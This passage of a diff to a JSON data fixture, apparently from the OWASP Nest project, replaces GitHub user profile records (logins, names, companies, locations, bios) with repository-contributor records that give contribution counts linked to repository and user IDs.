"nest_created_at": "2024-09-22T02:48:39.479Z", + "nest_updated_at": "2024-09-22T15:27:55.540Z", + "contributions_count": 10, + "repository": 28, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 58, "fields": { - "nest_created_at": "2024-09-11T19:26:40.951Z", - "nest_updated_at": "2024-09-18T17:38:21.963Z", - "name": "", - "login": "BOOBALANMR14", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/93393514?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-10-29T15:02:10Z", - "updated_at": "2024-08-26T12:36:36Z", - "node_id": "U_kgDOBZESag", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:42.464Z", + "nest_updated_at": "2024-09-22T15:27:58.379Z", + "contributions_count": 25, + "repository": 29, + "user": 3289 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 59, "fields": { - "nest_created_at": "2024-09-11T19:28:09.558Z", - "nest_updated_at": "2024-09-18T18:55:30.213Z", - "name": "Daniel Neagaru", - "login": "danielonsecurity", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65662675?v=4", - "company": "@DigeeX ", - "location": "Hamburg", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-05-20T12:37:25Z", - "updated_at": "2024-03-08T11:29:56Z", - "node_id": "MDQ6VXNlcjY1NjYyNjc1", - "bio": "IT security enthusiast, trying to help build a safer Internet.\r\n", - "is_hireable": false, - "twitter_username": "digeex_security" + "nest_created_at": "2024-09-22T02:48:42.780Z", + "nest_updated_at": "2024-09-22T15:27:58.684Z", + "contributions_count": 9, + "repository": 29, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 60, "fields": { - "nest_created_at": "2024-09-11T19:28:41.454Z", - "nest_updated_at": "2024-09-18T18:55:30.524Z", - "name": "Gwisin Koht", - "login": "gwisinkoht", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84480419?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 6, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-05-19T22:26:01Z", - "updated_at": "2023-11-17T20:15:08Z", - "node_id": "MDQ6VXNlcjg0NDgwNDE5", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:43.100Z", + "nest_updated_at": "2024-09-22T15:27:58.991Z", + "contributions_count": 6, + "repository": 29, + "user": 3291 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 61, "fields": { - "nest_created_at": "2024-09-11T19:30:30.852Z", - "nest_updated_at": "2024-09-18T17:51:07.048Z", - "name": "Spyros", - "login": "northdpole", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1583262?v=4", - "company": "https://smithy.security", - "location": "Knowhere", - "collaborators_count": 0, - "following_count": 77, - "followers_count": 73, - "public_gists_count": 11, - "public_repositories_count": 46, - "created_at": "2012-03-28T12:30:20Z", - "updated_at": "2024-09-18T09:12:19Z", - "node_id": "MDQ6VXNlcjE1ODMyNjI=", - "bio": "Founder @https://smithy.security -- security workflow automation,\r\n\r\nmaintainer of OpenCRE -- https://opencre.org", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:45.904Z", + "nest_updated_at": "2024-09-22T15:28:01.834Z", + "contributions_count": 10, + "repository": 30, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 62, "fields": { - "nest_created_at": "2024-09-11T19:30:40.864Z", - "nest_updated_at": "2024-09-11T19:30:40.864Z", - "name": "Mees", - "login": "Meess", - "email": "meeskalf@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/8512566?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-08-21T10:17:56Z", - "updated_at": "2024-07-26T13:54:48Z", - "node_id": "MDQ6VXNlcjg1MTI1NjY=", - "bio": "I see code", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:46.218Z", + "nest_updated_at": "2024-09-22T15:28:02.183Z", + "contributions_count": 7, + "repository": 30, + "user": 3296 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 63, "fields": { - "nest_created_at": "2024-09-11T19:30:42.888Z", - "nest_updated_at": "2024-09-18T18:07:57.825Z", - "name": "Björn Kimminich", - "login": "bkimminich", - "email": "github.com@kimminich.de", - "avatar_url": "https://avatars.githubusercontent.com/u/3531020?v=4", - "company": "@kuehne-nagel", - "location": "Hamburg, Germany", - "collaborators_count": 0, - "following_count": 215, - "followers_count": 1091, - "public_gists_count": 5, - "public_repositories_count": 103, - "created_at": "2013-02-11T10:08:16Z", - "updated_at": "2024-09-09T07:19:10Z", - "node_id": "MDQ6VXNlcjM1MzEwMjA=", - "bio": "IT Product Group Lead @kuehne-nagel, Project Leader @OWASP @juice-shop", - "is_hireable": false, - "twitter_username": "bkimminich" + "nest_created_at": "2024-09-22T02:48:49.008Z", + "nest_updated_at": "2024-09-22T15:28:04.954Z", + "contributions_count": 10, + "repository": 31, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 64, "fields": { - "nest_created_at": "2024-09-11T19:30:49.561Z", - "nest_updated_at": "2024-09-11T19:30:49.562Z", - "name": "Flo", - "login": "flowirtz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6052785?v=4", - "company": "", - "location": "London", - "collaborators_count": 0, - "following_count": 114, - "followers_count": 80, - "public_gists_count": 1, - "public_repositories_count": 20, - "created_at": "2013-11-27T18:55:08Z", - "updated_at": "2024-08-26T11:26:44Z", - "node_id": "MDQ6VXNlcjYwNTI3ODU=", - "bio": "", - "is_hireable": false, - "twitter_username": "flowirtz" + "nest_created_at": "2024-09-22T02:48:49.355Z", + "nest_updated_at": "2024-09-22T15:28:05.268Z", + "contributions_count": 1, + "repository": 31, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 65, "fields": { - "nest_created_at": "2024-09-11T19:31:13.258Z", - "nest_updated_at": "2024-09-11T19:31:13.258Z", - "name": "Dimitar Raichev", - "login": "DRaichev", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52790026?v=4", - "company": "", - "location": "Sofia, Bulgaria", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2019-07-11T13:49:54Z", - "updated_at": "2024-07-23T09:51:29Z", - "node_id": "MDQ6VXNlcjUyNzkwMDI2", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:52.340Z", + "nest_updated_at": "2024-09-22T15:28:08.161Z", + "contributions_count": 25, + "repository": 32, + "user": 3297 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 66, "fields": { - "nest_created_at": "2024-09-11T19:31:16.567Z", - "nest_updated_at": "2024-09-11T19:31:16.567Z", - "name": "Alex", - "login": "stateandprove", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/80955529?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2021-03-19T10:34:13Z", - "updated_at": "2024-09-02T22:18:57Z", - "node_id": "MDQ6VXNlcjgwOTU1NTI5", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:52.654Z", + "nest_updated_at": "2024-09-22T15:28:08.481Z", + "contributions_count": 10, + "repository": 32, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 67, "fields": { - "nest_created_at": "2024-09-11T19:31:22.262Z", - "nest_updated_at": "2024-09-18T19:10:05.286Z", - "name": "Aram Hovsepyan", - "login": "aramhovsepyan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25081340?v=4", - "company": "Codific", - "location": "", - "collaborators_count": 0, - "following_count": 7, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 2, - "created_at": "2017-01-12T14:06:13Z", - "updated_at": "2024-09-11T13:32:16Z", - "node_id": "MDQ6VXNlcjI1MDgxMzQw", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:55.722Z", + "nest_updated_at": "2024-09-22T15:28:11.330Z", + "contributions_count": 3, + "repository": 33, + "user": 116 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 68, "fields": { - "nest_created_at": "2024-09-11T19:31:23.531Z", - "nest_updated_at": "2024-09-11T19:31:23.531Z", - "name": "", - "login": "cr-axway", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49165141?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-04-01T17:18:56Z", - "updated_at": "2024-02-06T16:05:16Z", - "node_id": "MDQ6VXNlcjQ5MTY1MTQx", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:56.031Z", + "nest_updated_at": "2024-09-22T15:28:11.654Z", + "contributions_count": 2, + "repository": 33, + "user": 198 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 69, "fields": { - "nest_created_at": "2024-09-11T19:31:26.573Z", - "nest_updated_at": "2024-09-11T19:31:26.573Z", - "name": "Ollie Cuffley-Hur", - "login": "olcuhu", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10589589?v=4", - "company": "ControlPlane", - "location": "", - "collaborators_count": 0, - "following_count": 8, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 16, - "created_at": "2015-01-19T01:10:47Z", - "updated_at": "2024-08-12T12:58:34Z", - "node_id": "MDQ6VXNlcjEwNTg5NTg5", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:56.378Z", + "nest_updated_at": "2024-09-22T15:28:12.049Z", + "contributions_count": 2, + "repository": 33, + "user": 322 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 70, "fields": { - "nest_created_at": "2024-09-11T19:31:26.965Z", - "nest_updated_at": "2024-09-11T19:31:49.335Z", - "name": "Diana", - "login": "dlicheva", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8710269?v=4", - "company": "Ocurity", - "location": "London, UK", - "collaborators_count": 0, - "following_count": 6, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2014-09-09T13:48:25Z", - "updated_at": "2024-09-04T13:04:57Z", - "node_id": "MDQ6VXNlcjg3MTAyNjk=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:56.698Z", + "nest_updated_at": "2024-09-22T15:28:12.419Z", + "contributions_count": 1, + "repository": 33, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 71, "fields": { - "nest_created_at": "2024-09-11T19:31:29.145Z", - "nest_updated_at": "2024-09-11T19:31:29.145Z", - "name": "John Harvey", - "login": "john681611", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10814889?v=4", - "company": "@MongoDB", - "location": "London", - "collaborators_count": 0, - "following_count": 5, - "followers_count": 14, - "public_gists_count": 0, - "public_repositories_count": 69, - "created_at": "2015-02-02T17:20:12Z", - "updated_at": "2024-08-12T16:30:43Z", - "node_id": "MDQ6VXNlcjEwODE0ODg5", - "bio": "Senior Software Engineer,\r\nMaintainer of Briefing Room for DCS,\r\nArmA 3 Mission/Script Developer\r\n\r\nI don't hide my messy/half-arsed project", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:59.515Z", + "nest_updated_at": "2024-09-22T15:28:15.344Z", + "contributions_count": 10, + "repository": 34, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 72, "fields": { - "nest_created_at": "2024-09-11T19:31:36.278Z", - "nest_updated_at": "2024-09-11T19:31:36.278Z", - "name": "Yavor Kolev", - "login": "javorkolev123", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23657555?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2016-11-22T13:05:24Z", - "updated_at": "2024-09-11T10:24:29Z", - "node_id": "MDQ6VXNlcjIzNjU3NTU1", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:48:59.834Z", + "nest_updated_at": "2024-09-22T15:28:15.659Z", + "contributions_count": 3, + "repository": 34, + "user": 3298 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 73, "fields": { - "nest_created_at": "2024-09-11T19:31:48.103Z", - "nest_updated_at": "2024-09-11T19:31:56.012Z", - "name": "", - "login": "5t00g1t", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29344572?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-06-10T22:36:08Z", - "updated_at": "2024-08-22T16:06:11Z", - "node_id": "MDQ6VXNlcjI5MzQ0NTcy", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:02.657Z", + "nest_updated_at": "2024-09-22T15:28:18.668Z", + "contributions_count": 17, + "repository": 35, + "user": 3299 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 74, "fields": { - "nest_created_at": "2024-09-11T19:31:56.825Z", - "nest_updated_at": "2024-09-18T17:40:06.018Z", - "name": "Charif Mahmoudi", - "login": "charifmahmoudi", - "email": "charif.mahmoudi@siemens.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6098664?v=4", - "company": "Siemens Corporate Techmology", - "location": "Princeton NJ", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2013-12-03T19:56:36Z", - "updated_at": "2024-09-17T02:28:39Z", - "node_id": "MDQ6VXNlcjYwOTg2NjQ=", - "bio": "Dr. Charif Mahmoudi received the MSc and PhD degrees in computer engineering from the University of Paris-EST (France) in 2009 and 2014, respectively.", - "is_hireable": true, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:02.977Z", + "nest_updated_at": "2024-09-22T15:28:18.981Z", + "contributions_count": 10, + "repository": 35, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 75, "fields": { - "nest_created_at": "2024-09-11T19:32:01.926Z", - "nest_updated_at": "2024-09-18T17:40:10.843Z", - "name": "Smita", - "login": "SMITA-ME", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/89657173?v=4", - "company": "GTU - GSET", - "location": "Ahemdabad, Gujarat", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2021-08-27T17:10:00Z", - "updated_at": "2022-02-15T07:18:57Z", - "node_id": "MDQ6VXNlcjg5NjU3MTcz", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:05.838Z", + "nest_updated_at": "2024-09-22T15:28:21.865Z", + "contributions_count": 14, + "repository": 36, + "user": 3300 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 76, "fields": { - "nest_created_at": "2024-09-11T19:32:27.174Z", - "nest_updated_at": "2024-09-11T19:32:28.899Z", - "name": "Michael Bargury", - "login": "mbrg", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11074433?v=4", - "company": "@zenitysec", - "location": "", - "collaborators_count": 0, - "following_count": 12, - "followers_count": 142, - "public_gists_count": 3, - "public_repositories_count": 76, - "created_at": "2015-02-19T12:33:40Z", - "updated_at": "2024-09-11T15:46:14Z", - "node_id": "MDQ6VXNlcjExMDc0NDMz", - "bio": "Hacking, AppSec, crypto and low-code/no-code | Co-founder & CTO at Zenity, lead OWASP No Code, Ex MSFT security", - "is_hireable": false, - "twitter_username": "mbrg0" + "nest_created_at": "2024-09-22T02:49:06.155Z", + "nest_updated_at": "2024-09-22T15:28:22.172Z", + "contributions_count": 10, + "repository": 36, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 77, "fields": { - "nest_created_at": "2024-09-11T19:32:27.582Z", - "nest_updated_at": "2024-09-11T19:32:27.582Z", - "name": "", - "login": "johndtgroup", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/127353582?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-03-08T21:53:08Z", - "updated_at": "2023-03-08T21:53:08Z", - "node_id": "U_kgDOB5dC7g", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:06.469Z", + "nest_updated_at": "2024-09-22T15:28:22.492Z", + "contributions_count": 1, + "repository": 36, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 78, "fields": { - "nest_created_at": "2024-09-11T19:32:30.172Z", - "nest_updated_at": "2024-09-13T03:46:09.788Z", - "name": "Yianna Paris", - "login": "nekosoft", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24336984?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 10, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 50, - "created_at": "2016-12-03T04:17:52Z", - "updated_at": "2024-08-09T14:17:58Z", - "node_id": "MDQ6VXNlcjI0MzM2OTg0", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:09.372Z", + "nest_updated_at": "2024-09-22T15:28:25.973Z", + "contributions_count": 7, + "repository": 37, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 79, "fields": { - "nest_created_at": "2024-09-11T19:35:23.239Z", - "nest_updated_at": "2024-09-18T17:42:50.644Z", - "name": "Takahiro Yoshimura", - "login": "alterakey", - "email": "altakey@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/303596?v=4", - "company": "Monolith Works Inc.", - "location": "Japan", - "collaborators_count": 0, - "following_count": 42, - "followers_count": 52, - "public_gists_count": 65, - "public_repositories_count": 49, - "created_at": "2010-06-12T15:18:56Z", - "updated_at": "2024-06-26T08:31:04Z", - "node_id": "MDQ6VXNlcjMwMzU5Ng==", - "bio": "", - "is_hireable": false, - "twitter_username": "alterakey" + "nest_created_at": "2024-09-22T02:49:09.710Z", + "nest_updated_at": "2024-09-22T15:28:26.280Z", + "contributions_count": 7, + "repository": 37, + "user": 3289 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 80, "fields": { - "nest_created_at": "2024-09-11T19:35:34.619Z", - "nest_updated_at": "2024-09-18T17:42:59.413Z", - "name": "Markus", - "login": "CodeDrop", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19193743?v=4", - "company": "", - "location": "Munich", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-05-04T18:49:42Z", - "updated_at": "2024-08-22T17:51:38Z", - "node_id": "MDQ6VXNlcjE5MTkzNzQz", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:10.032Z", + "nest_updated_at": "2024-09-22T15:28:26.588Z", + "contributions_count": 5, + "repository": 37, + "user": 3301 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 81, "fields": { - "nest_created_at": "2024-09-11T19:36:11.421Z", - "nest_updated_at": "2024-09-11T19:36:11.421Z", - "name": "Jean Novak", - "login": "jeannovak", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42330295?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2018-08-13T02:42:13Z", - "updated_at": "2023-04-17T03:45:06Z", - "node_id": "MDQ6VXNlcjQyMzMwMjk1", - "bio": "Bronze medalist at WorldSkills 2019 - Cybersecurity", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:10.346Z", + "nest_updated_at": "2024-09-22T15:28:26.932Z", + "contributions_count": 2, + "repository": 37, + "user": 3302 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 82, "fields": { - "nest_created_at": "2024-09-11T19:36:13.110Z", - "nest_updated_at": "2024-09-11T19:36:13.110Z", - "name": "Michael Jones", - "login": "mikeacjones", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25686778?v=4", - "company": "", - "location": "Atlanta, GA", - "collaborators_count": 0, - "following_count": 3, - "followers_count": 21, - "public_gists_count": 23, - "public_repositories_count": 64, - "created_at": "2017-02-10T12:22:05Z", - "updated_at": "2024-08-20T12:02:53Z", - "node_id": "MDQ6VXNlcjI1Njg2Nzc4", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:11.299Z", + "nest_updated_at": "2024-09-22T15:28:27.250Z", + "contributions_count": 1, + "repository": 37, + "user": 3303 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 83, "fields": { - "nest_created_at": "2024-09-11T19:36:16.411Z", - "nest_updated_at": "2024-09-11T19:36:16.411Z", - "name": "Ralph Adame", - "login": "radame2", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47871416?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-02-21T22:17:39Z", - "updated_at": "2024-03-02T17:48:49Z", - "node_id": "MDQ6VXNlcjQ3ODcxNDE2", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:14.342Z", + "nest_updated_at": "2024-09-22T15:28:30.105Z", + "contributions_count": 50, + "repository": 38, + "user": 3304 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 84, "fields": { - "nest_created_at": "2024-09-11T19:36:18.067Z", - "nest_updated_at": "2024-09-11T19:36:39.684Z", - "name": "Jayesh Bapu Ahire", - "login": "JBAhire", - "email": "jayeshbahire@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/26570044?v=4", - "company": "@Traceableai, @hypertrace", - "location": "Pune, India", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 82, - "public_gists_count": 2, - "public_repositories_count": 84, - "created_at": "2017-03-21T10:42:43Z", - "updated_at": "2024-08-28T11:50:22Z", - "node_id": "MDQ6VXNlcjI2NTcwMDQ0", - "bio": "Product | Security & Observability 🥑 | Author | AWS Machine Learning Hero | @twilio champion | Community organizer @aws @elastic @microsoft @tensorflow |", - "is_hireable": true, - "twitter_username": "Jayesh_Ahire1" + "nest_created_at": "2024-09-22T02:49:14.655Z", + "nest_updated_at": "2024-09-22T15:28:30.416Z", + "contributions_count": 6, + "repository": 38, + "user": 61 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 85, "fields": { - "nest_created_at": "2024-09-11T19:36:18.477Z", - "nest_updated_at": "2024-09-11T19:36:18.477Z", - "name": "Dhruv Singhal", - "login": "dhruv-singhal-github", - "email": "f20170765@pilani.bits-pilani.ac.in", - "avatar_url": "https://avatars.githubusercontent.com/u/39822483?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2018-06-01T07:07:00Z", - "updated_at": "2024-06-24T17:12:24Z", - "node_id": "MDQ6VXNlcjM5ODIyNDgz", - "bio": "Perfectly balanced, as all things should be.", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:15.000Z", + "nest_updated_at": "2024-09-22T15:28:30.727Z", + "contributions_count": 3, + "repository": 38, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 86, "fields": { - "nest_created_at": "2024-09-11T19:36:20.562Z", - "nest_updated_at": "2024-09-11T19:36:20.562Z", - "name": "Alok Hegde", - "login": "alok1929", - "email": "alokhegde221@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/51386198?v=4", - "company": "", - "location": "Bangalore,India", - "collaborators_count": 0, - "following_count": 12, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 84, - "created_at": "2019-06-04T22:04:11Z", - "updated_at": "2024-09-07T07:19:10Z", - "node_id": "MDQ6VXNlcjUxMzg2MTk4", - "bio": "blogger | web dev | aiml |\r\n", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:18.618Z", + "nest_updated_at": "2024-09-22T15:28:34.266Z", + "contributions_count": 60, + "repository": 39, + "user": 3290 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 87, "fields": { - "nest_created_at": "2024-09-11T19:36:23.012Z", - "nest_updated_at": "2024-09-11T19:36:23.012Z", - "name": "Yash Baban Salve", - "login": "YashSalve695", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71492690?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2020-09-18T08:58:50Z", - "updated_at": "2023-12-22T05:28:54Z", - "node_id": "MDQ6VXNlcjcxNDkyNjkw", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:18.935Z", + "nest_updated_at": "2024-09-22T15:28:34.576Z", + "contributions_count": 3, + "repository": 39, + "user": 3301 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 88, "fields": { - "nest_created_at": "2024-09-11T19:36:23.426Z", - "nest_updated_at": "2024-09-11T19:36:23.426Z", - "name": "Ayush Sharma", - "login": "ayushthe1", - "email": "ayushsharmaa101@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/114604338?v=4", - "company": "FealtyX", - "location": "India", - "collaborators_count": 0, - "following_count": 28, - "followers_count": 31, - "public_gists_count": 1, - "public_repositories_count": 48, - "created_at": "2022-09-28T16:18:27Z", - "updated_at": "2024-08-03T05:12:44Z", - "node_id": "U_kgDOBtS5Mg", - "bio": "A curious learner who loves to collaborate \r\n \r\n | Go & DevOps enthusiast", - "is_hireable": false, - "twitter_username": "ayushthe5" + "nest_created_at": "2024-09-22T02:49:21.913Z", + "nest_updated_at": "2024-09-22T15:28:37.299Z", + "contributions_count": 10, + "repository": 40, + "user": 3274 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 89, "fields": { - "nest_created_at": "2024-09-11T19:36:26.336Z", - "nest_updated_at": "2024-09-11T19:36:26.336Z", - "name": "Ravisuriya Eswara", - "login": "testingGarage", - "email": "ravisuriya1@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9585769?v=4", - "company": "", - "location": "Bengaluru", - "collaborators_count": 0, - "following_count": 4, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 19, - "created_at": "2014-11-06T05:56:42Z", - "updated_at": "2024-05-10T13:02:07Z", - "node_id": "MDQ6VXNlcjk1ODU3Njk=", - "bio": "Student of Software Testing | Software Test Engineer", - "is_hireable": false, - "twitter_username": "testingGarage" + "nest_created_at": "2024-09-22T02:49:22.239Z", + "nest_updated_at": "2024-09-22T15:28:37.613Z", + "contributions_count": 7, + "repository": 40, + "user": 3305 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 90, "fields": { - "nest_created_at": "2024-09-11T19:36:30.080Z", - "nest_updated_at": "2024-09-11T19:36:40.128Z", - "name": "Chahat Jain", - "login": "chahat99", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42612949?v=4", - "company": "@Traceableai ", - "location": "Bangalore India", - "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2018-08-22T14:13:25Z", - "updated_at": "2023-05-31T10:39:08Z", - "node_id": "MDQ6VXNlcjQyNjEyOTQ5", - "bio": "SWE @Traceableai ", - "is_hireable": false, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:22.552Z", + "nest_updated_at": "2024-09-22T15:28:37.963Z", + "contributions_count": 1, + "repository": 40, + "user": 3286 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 91, "fields": { - "nest_created_at": "2024-09-11T19:36:32.498Z", - "nest_updated_at": "2024-09-11T19:36:32.498Z", - "name": "", - "login": "afreen23", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25664409?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 2, - "followers_count": 7, - "public_gists_count": 10, - "public_repositories_count": 62, - "created_at": "2017-02-09T13:43:08Z", - "updated_at": "2024-08-22T07:33:18Z", - "node_id": "MDQ6VXNlcjI1NjY0NDA5", - "bio": "", - "is_hireable": true, - "twitter_username": "" + "nest_created_at": "2024-09-22T02:49:25.512Z", + "nest_updated_at": "2024-09-22T15:28:40.848Z", + "contributions_count": 145, + "repository": 41, + "user": 3306 } }, { - "model": "github.user", + "model": "github.repositorycontributor", "pk": 92, "fields": { - "nest_created_at": "2024-09-11T19:36:41.836Z", - "nest_updated_at": "2024-09-11T19:36:41.836Z", - "name": "", - "login": "wIngy123", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111032533?v=4", - "company": "", - "location": "", - "collaborators_count": 0, 